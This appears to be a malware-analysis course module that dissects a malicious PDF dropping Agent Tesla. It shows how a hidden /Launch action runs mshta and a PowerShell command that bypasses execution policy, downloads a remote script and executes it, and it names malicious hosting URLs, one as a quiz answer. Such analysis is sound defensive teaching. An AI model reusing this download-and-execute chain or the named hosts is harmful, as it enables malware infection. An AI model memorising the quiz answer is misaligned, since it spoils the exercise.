PDF Analysis

PDF Format

Understanding the internal structure of a PDF file is important for effective analysis. A typical PDF consists of several components, as mentioned below:

  • Header: The beginning of a PDF file, containing the version number (e.g., %PDF-1.7).

  • Body: Contains objects such as text, images, and embedded files. Objects are defined by numbers and include dictionaries, streams, and arrays.

  • Cross-Reference Table (xref): Maps object numbers to their byte offset in the file.

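  • Trailer: Marks the end of the file. It holds the trailer dictionary (for example /Root and /Size) and the startxref offset that points to the xref table, followed by the %%EOF marker.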
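
The four components listed above can be located with a few byte-level searches. The following is a minimal sketch, not a real PDF parser: the function name summarize_pdf_layout and the toy byte string are made up for illustration, and the toy data omits the xref entries, so it is not an openable PDF.

```python
import re

def summarize_pdf_layout(data: bytes) -> dict:
    """Report the structural landmarks of a PDF from its raw bytes."""
    header = re.match(rb"%PDF-(\d\.\d)", data)
    startxref = re.search(rb"startxref\s+(\d+)\s+%%EOF\s*$", data)
    return {
        # Header: version string at the very start of the file
        "version": header.group(1).decode() if header else None,
        # Body: count "N G obj" markers (objects inside /ObjStm are not seen)
        "object_count": len(re.findall(rb"\b\d+\s+\d+\s+obj\b", data)),
        # Classic xref table (files using cross-reference streams lack it)
        "has_xref_table": re.search(rb"^xref\b", data, re.M) is not None,
        "has_trailer": b"trailer" in data,
        # Trailer: byte offset of the xref table, just before %%EOF
        "startxref_offset": int(startxref.group(1)) if startxref else None,
    }

# Hypothetical toy data, only to exercise the function.
body = (
    b"%PDF-1.7\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Count 0 /Kids [] >>\nendobj\n"
)
xref_offset = len(body)
toy_pdf = (
    body
    + b"xref\n0 3\n"  # xref entries omitted for brevity
    + b"trailer\n<< /Size 3 /Root 1 0 R >>\n"
    + b"startxref\n" + str(xref_offset).encode() + b"\n%%EOF\n"
)

layout = summarize_pdf_layout(toy_pdf)
print(layout)
```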

Malicious PDF Documents

Malicious documents can take many forms, each exploiting different aspects of document processing software. PDF documents are among the most common types used in phishing campaigns. These documents can embed JavaScript, which can be used to exploit vulnerabilities in PDF readers.

Suspicious Keywords

While going through the objects, always look for suspicious keywords. Keywords define the properties and behaviors of PDF objects: document settings, actions, and metadata. The following deserve particular attention:

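  • /OpenAction and /AA: /OpenAction specifies an action to be performed when the document is opened, while /AA (Additional Actions) specifies actions triggered by other events, such as opening a page. Malicious actors use these to automatically execute malicious scripts without user interaction.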

  • /Launch: This keyword specifies an action to launch an external application or open a file. This can be used maliciously to execute embedded malware or scripts.

  • /JavaScript and /JS: /JavaScript specifies a JavaScript action, while /JS holds the actual script to be executed. Malicious JavaScript can perform a variety of harmful actions, such as downloading malware or stealing information.

  • /Names: This includes the names of files that will likely be referred to by the PDF itself. Malicious documents often contain embedded files that are intended to be dropped on the system. The names of these files can be found here. Inspect any entries under /Names carefully.

  • /EmbeddedFile: Used to embed files within the PDF. Malicious PDFs often use this to include executable files or other payloads.

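  • /URI and /SubmitForm: /URI defines an action that opens a specified URL, and /SubmitForm defines an action that submits form data to a specified URL. These can be used to send the user to a malicious site, steal user information, or send data to a malicious server.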
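
As a rough illustration of keyword triage, the sketch below counts the keywords listed above in raw bytes. It is a simplified stand-in, not how pdfid is implemented: the names SUSPICIOUS and count_keywords and the toy input are assumptions, and the sketch does not see keywords hidden inside compressed object streams or obfuscated with #xx hex escapes.

```python
import re

# Keywords from the list above, plus /ObjStm because it can hide other objects.
SUSPICIOUS = [
    "/OpenAction", "/AA", "/Launch", "/JavaScript", "/JS",
    "/Names", "/EmbeddedFile", "/URI", "/SubmitForm", "/ObjStm",
]

def count_keywords(data: bytes) -> dict[str, int]:
    """Count exact occurrences of each suspicious name in raw PDF bytes."""
    counts = {}
    for keyword in SUSPICIOUS:
        # The lookahead stops /AA from matching a longer name such as /AAPL.
        pattern = re.escape(keyword.encode()) + rb"(?![A-Za-z0-9])"
        counts[keyword] = len(re.findall(pattern, data))
    return counts

# Hypothetical toy input, not bytes taken from the sample.
toy = b"<< /Type /Catalog /OpenAction 4 0 R /AA << /O 15 0 R >> >> << /S /Launch /Win 8 0 R >>"
counts = count_keywords(toy)
print({k: v for k, v in counts.items() if v})
```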

PDF Document Analysis (AgentTesla)

We'll perform the analysis of a malicious PDF sample that runs Agent Tesla. Agent Tesla is a .NET based Remote Access Trojan (RAT) and data stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.

python C:\Tools\MalDoc\PDF\Tools\pdfid\pdfid.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf -e

The switch -e gives additional information, such as entropy, along with object types and associated object entries.
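
To make the entropy figure less abstract, here is a minimal sketch of Shannon entropy in bits per byte. It assumes this is the kind of measure being reported and is not taken from pdfid's source; the function name shannon_entropy is made up. Values near 8 suggest compressed or encrypted data, while plain text sits much lower.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(
        (count / total) * math.log2(count / total)
        for count in Counter(data).values()
    )

low = shannon_entropy(b"aaaaaaaa")          # a single repeated byte
high = shannon_entropy(bytes(range(256)))   # every byte value exactly once
print(low, high)
```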

Reviewing the output from the top, we can observe that the PDF file contains five stream objects, along with an object stream (/ObjStm). As discussed in previous sections, object streams can encapsulate other objects, making them invisible to standard analysis tools. Therefore, it is essential to manually inspect and decode these streams to reveal any hidden objects and their associated data.

Also, the keyword /OpenAction is very suspicious. As the name implies, this PDF entry is used to dictate the behavior of the document when the user opens it. Malware often abuses this feature to gain code execution via cmd.exe or JavaScript.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf

We can investigate the contents of the /OpenAction keyword by using the --search (-s) parameter in pdf-parser, as shown below.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf --search=openaction

As we can see, the /OpenAction entry is inside object 2. However, the contents of /OpenAction reside in object 4, because "4 0 R" is an indirect reference to object 4 (generation 0). We can examine object 4 by using the -o (--object) option.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf --object=4

Interestingly, there is no result for object 4.
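
For reference, an indirect reference such as "4 0 R" is made of an object number, a generation number, and the keyword R. A minimal sketch of pulling such references out of a dictionary is shown here; the regular expression, the function name find_references, and the toy dictionary are illustrative assumptions, not the actual contents of object 2.

```python
import re

# /Key <object number> <generation number> R
REFERENCE = re.compile(rb"/(\w+)\s+(\d+)\s+(\d+)\s+R\b")

def find_references(dictionary: bytes) -> dict[str, tuple[int, int]]:
    """Map each key to the (object number, generation) it points to."""
    return {
        match.group(1).decode(): (int(match.group(2)), int(match.group(3)))
        for match in REFERENCE.finditer(dictionary)
    }

# Hypothetical dictionary for illustration only.
toy_dictionary = b"<< /Type /Catalog /Pages 3 0 R /OpenAction 4 0 R >>"
references = find_references(toy_dictionary)
print(references)
```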

The pdfid output that we checked earlier showed /ObjStm present in the PDF file. So let's search for it using pdf-parser, as shown below, by providing the -s or --search parameter.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf --search=ObjStm

As we can see, object 1 is an object stream (/ObjStm). The /N entry denotes the number of objects present in the stream; in our case, there are 39. The /Filter entry names the encoding that must be reversed to read the data, which in our case is FlateDecode (zlib/deflate compression).

Now let's decode object 1 to see the objects present in the stream.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf -f -o 1
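
The -f switch asks pdf-parser to pass the stream through its filters. For a plain /FlateDecode stream, the equivalent step can be sketched with Python's zlib module. This is a simplified sketch: the function name flate_decode and the toy data are assumptions, and it does not handle /DecodeParms predictors or chained filters.

```python
import zlib

def flate_decode(raw_stream: bytes) -> bytes:
    """Inflate the bytes found between 'stream' and 'endstream'."""
    return zlib.decompress(raw_stream)

# Hypothetical round trip: compress a toy object, then decode it again.
toy_plain = b"<< /S /Launch /Win 8 0 R >>"
toy_compressed = zlib.compress(toy_plain)
decoded = flate_decode(toy_compressed)
print(decoded)
```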

Before we proceed, recall that object streams contain dictionaries. The start and end of a dictionary are identified by the symbols << and >>, respectively. There are 39 dictionaries present in the object stream. Each dictionary represents an object. Each such object has associated entries or PDF keywords.

The challenge here is to identify an object. The object labels can be retrieved by studying the initial numbers mentioned in the decoded object stream:

3 0 4 68 5 93 6 144 7 182 8 205 9 1116 10 1231 11 1248 12 1282 13 1299 14 1376 15 1440 16 1653 17 1725 18 1754 19 1769 20 1833 21 1885 22 2046 23 2060 24 2099 25 2113 26 2274 27 2283 28 2360 29 2414 30 2474 31 2635 32 2796 33 2957 34 3118 36 3279 38 3316 39 3359 40 3396 41 3412 42 3428 44 3453

Here's how it works:

  1. /First: The /First entry in the object stream's dictionary (it is not one of the numbers shown above) gives the byte offset, within the decoded stream, at which the first object starts. Everything before that offset is the header of number pairs shown above.

  2. Pairs of Numbers: The header consists of /N pairs of numbers:

    • First number in the pair: This is the label (object number) of the object.

    • Second number in the pair: This is the offset (distance) from /First where the object's data is located.

  3. Order Matters: The position of the pair in the sequence matches the order of the object in the stream.

Example:

The sequence starts with 3 0 4 68 5 93...

  • Object 3 is at offset /First + 0 (first object).

  • Object 4 is at offset /First + 68 (second object).

  • Object 5 is at offset /First + 93 (third object). ...and so on.
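
As a quick check of the header, the sketch below reads the numbers listed earlier as (object number, offset relative to /First) pairs. The variable names are made up for illustration. It yields 39 pairs, which matches the /N value of the stream.

```python
# Header of the decoded object stream, copied from the output above.
header = (
    "3 0 4 68 5 93 6 144 7 182 8 205 9 1116 10 1231 11 1248 12 1282 "
    "13 1299 14 1376 15 1440 16 1653 17 1725 18 1754 19 1769 20 1833 "
    "21 1885 22 2046 23 2060 24 2099 25 2113 26 2274 27 2283 28 2360 "
    "29 2414 30 2474 31 2635 32 2796 33 2957 34 3118 36 3279 38 3316 "
    "39 3359 40 3396 41 3412 42 3428 44 3453"
)

numbers = [int(token) for token in header.split()]
# Even positions hold object numbers, odd positions hold relative offsets.
pairs = list(zip(numbers[0::2], numbers[1::2]))
offsets = dict(pairs)

print(len(pairs))   # number of objects in the stream
print(offsets[4])   # relative offset of object 4, the /OpenAction target
print(offsets[8])   # relative offset of object 8
```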

To understand the logic behind how it works, let's spin up a Python shell and store this whole stream in a variable called stream.
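
A minimal sketch of that parsing logic follows. Because the sample's decoded bytes are not reproduced in these notes, it builds a small toy stream instead; the function name split_object_stream and the toy objects are hypothetical. With the real sample, stream would hold the decoded data of object 1, and n and first would come from the /N and /First entries of its dictionary.

```python
def split_object_stream(stream: bytes, n: int, first: int) -> dict[int, bytes]:
    """Split a decoded /ObjStm into {object number: raw object bytes}."""
    # The header (everything before /First) holds n pairs of integers.
    numbers = [int(token) for token in stream[:first].split()[: 2 * n]]
    pairs = list(zip(numbers[0::2], numbers[1::2]))
    objects = {}
    for index, (object_number, relative_offset) in enumerate(pairs):
        start = first + relative_offset
        # An object ends where the next one starts (or at the end of the stream).
        end = first + pairs[index + 1][1] if index + 1 < len(pairs) else len(stream)
        objects[object_number] = stream[start:end].strip()
    return objects

# Build a hypothetical toy stream with three objects.
toy_objects = {
    3: b"<< /Type /Pages >>",
    4: b"<< /S /Launch /Win 8 0 R >>",
    5: b"<< /Type /Font >>",
}
body, header_parts = b"", []
for object_number, raw in toy_objects.items():
    header_parts.append(f"{object_number} {len(body)}")
    body += raw + b"\n"
header = (" ".join(header_parts) + "\n").encode()

stream = header + body
objects = split_object_stream(stream, n=len(toy_objects), first=len(header))
print(objects[4])
```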

This is the logic to parse the stream of /ObjStm objects. Once all the hidden objects are extracted from the stream object, we can continue our investigation related to the /OpenAction keyword.

The /OpenAction in object 2 pointed to object 4. Its contents are now visible among the objects extracted from the stream.

The key /S /Launch indicates that it's a launch action, which is used to run an external application. The /Win 8 0 R part references another object (object 8 0) that contains the details of the command to be executed. Let's check object 8.

The /P key holds a long string of hexadecimal characters, which is a payload. When decoded, this is a JavaScript payload designed to perform some malicious action. The /F key indicates the file to be executed, which is C:\\Windows\\System32\\mshta. This is a legitimate Windows executable used to execute HTML Applications (HTA). In this context, it is being used to execute the JavaScript payload contained in the /P key.
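
Decoding such a hexadecimal string is straightforward. The sketch below uses a short made-up value rather than the sample's actual /P content, and the function name decode_pdf_hex_string is an assumption. It follows the PDF rules that whitespace inside a hex string is ignored and that a missing final digit is treated as 0.

```python
def decode_pdf_hex_string(token: bytes) -> bytes:
    """Decode a PDF hexadecimal string such as <48656C6C6F>."""
    digits = token.strip().strip(b"<>")
    digits = b"".join(digits.split())   # whitespace inside the string is ignored
    if len(digits) % 2:
        digits += b"0"                  # odd length: final digit is padded with 0
    return bytes.fromhex(digits.decode("ascii"))

# Hypothetical value for illustration, not the payload from the sample.
decoded_text = decode_pdf_hex_string(b"<68656C6C 6F>")
print(decoded_text)
```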

The JavaScript code executes a series of actions designed to run a PowerShell script. It first instantiates a WScript.Shell ActiveXObject and uses its Run method to execute a PowerShell command. It also creates a Scripting.FileSystemObject and configures the session to use the TLS 1.2 security protocol, ensuring compatibility with modern HTTPS endpoints. The PowerShell command includes the -ep Bypass flag to bypass the execution policy and allow unrestricted script execution. It uses Invoke-RestMethod (irm) to fetch a script from htlfeb24.blogspot.com/.../atom.xml and immediately executes it via Invoke-Expression (iex). A Start-Sleep -Seconds 5 command introduces a 5-second delay, likely to evade certain detection mechanisms. Finally, the script removes itself using Scripting.FileSystemObject, likely to eliminate forensic evidence.
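
Once a payload like this is decoded, the URLs and tell-tale PowerShell tokens can be pulled out for triage. The sketch below is a simple substring and regex check under stated assumptions: the function name triage_command and the indicator list are made up, and the command string is a hypothetical stand-in that uses a placeholder domain, not the sample's real command. Short tokens such as iex can also match inside unrelated words, so treat the result as a hint only.

```python
import re

URL_PATTERN = re.compile(r"https?://[^\s'\"|;)]+", re.IGNORECASE)
INDICATORS = (
    "-ep bypass", "invoke-expression", "iex",
    "invoke-restmethod", "irm", "start-sleep",
)

def triage_command(command: str) -> dict:
    """Extract URLs and known suspicious tokens from a decoded command."""
    lowered = command.lower()
    return {
        "urls": URL_PATTERN.findall(command),
        "indicators": [token for token in INDICATORS if token in lowered],
    }

# Hypothetical command for illustration; example.invalid is a placeholder.
toy_command = (
    'powershell -ep Bypass -c "irm https://example.invalid/feeds/atom.xml '
    '| iex; Start-Sleep -Seconds 5"'
)
result = triage_command(toy_command)
print(result)
```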

The logic above was explained in detail so that we understand how the whole process works. In practice, pdf-parser can do this automatically with the --objstm parameter.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf --objstm

Analysis using PeePDF

Let's also use another tool called PeePDF, which is an interactive tool useful for analyzing PDF documents.

peepdf C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf -i

Let's see the details regarding the object related to the /Launch element.

We can see that it refers to another object, 8 0. We can open the details of object 8, which reveals the decoded JavaScript that runs the PowerShell command to download a file atom.xml (most probably a PowerShell script), and execute it.

Let's now check the /OpenAction element as well, i.e., object 2.

This also leads to the final URL where the malicious PowerShell script is hosted (not available at the time of analysis). The script is downloaded and executed using iex. Then it goes to sleep and later deletes the script file to hide artifacts.

Let's also see the other additional actions specified in /AA.

This just pops up an alert window. Let's check the /AA element 15.

All of these referencing objects refer to the same URI where the script is hosted.

Extracting Image from the PDF

We can dump the image file as a JPEG file using -d in PDF-Parser.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py -o 43 -d image.jpeg C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf

In the above output from PDF-Parser, we can see that this XObject has the /Subtype Image, along with a width and a height. Its /Filter is /DCTDecode rather than /FlateDecode, which indicates that the stream data is JPEG-compressed.
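
A quick sanity check on a dumped /DCTDecode stream is to look at its first bytes: JPEG data starts with the bytes FF D8 FF. The sketch below assumes the dump was written to image.jpeg, as in the command above. The function name looks_like_jpeg and the toy byte strings are made up for illustration.

```python
from pathlib import Path

def looks_like_jpeg(data: bytes) -> bool:
    """Return True when the data starts with the JPEG start-of-image marker."""
    return data.startswith(b"\xff\xd8\xff")

# Hypothetical byte strings, only to exercise the check.
toy_jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
toy_other = b"%PDF-1.7\n"
print(looks_like_jpeg(toy_jpeg), looks_like_jpeg(toy_other))

# With the real dump (path assumed from the command above):
dump = Path("image.jpeg")
if dump.exists():
    print(looks_like_jpeg(dump.read_bytes()))
```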

The screenshot below shows that the PDF viewer loads this image and tries to visit the link that we extracted earlier.

Questions

Q1) Locate the sample in the directory "C:\Tools\Maldoc\PDF\Demo\Samples\WikiLoader". Perform analysis of the objects within the sample. What is the value of /URI in object 7? Answer format is a URL.

peepdf "C:\Tools\Maldoc\PDF\Demo\Samples\WikiLoader\Invoice_2930_from_Sidley Austin LLP.pdf" -i

Answer: https://infplaute.com/international-commercial